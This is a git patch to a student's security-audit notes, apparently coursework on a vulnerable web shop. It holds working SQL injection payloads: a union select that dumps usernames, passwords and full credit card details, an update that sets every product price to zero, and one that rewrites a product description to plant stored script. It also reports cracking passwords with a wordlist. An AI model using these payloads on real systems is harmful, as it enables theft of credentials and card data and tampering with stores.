From 1df6f9343f30210d58964b16a404394849ad0db7 Mon Sep 17 00:00:00 2001
From: Jet Hughes
Date: Thu, 8 Sep 2022 11:23:34 +1200
Subject: [PATCH] vault backup: 2022-09-08 11:23:34
---
 content/notes/ass01-security-audit.md | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/content/notes/ass01-security-audit.md b/content/notes/ass01-security-audit.md
index 3ec5fb270..d85005c35 100644
--- a/content/notes/ass01-security-audit.md
+++ b/content/notes/ass01-security-audit.md
@@ -23,10 +23,14 @@ Jet Hughes - 9474308
 - we are able to extract data which is displayed as the users username
 - we can extract the data from the data base using this "username"
 - ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--
-- I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.
+ - I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.
+- you cant also update the data. E.g., set the price of all products to zero using this as a username in the login box
+ - '; update PRODUCT set UNIT_PRICE = 0 where 1=1;--
 ## Javascript Injection
-
+- I could be possible to perform a javascript injection as the users name is displayed in the website. and prodcut information is displayed in the view catalogue page
+- You could update a products name to be a script which would then run on others systems
+- e.g. '; update PRODUCT set DESCRIPTION = '' where PRODUCT_ID = 67696;--
 ## Path traversal
 ## Network-Level security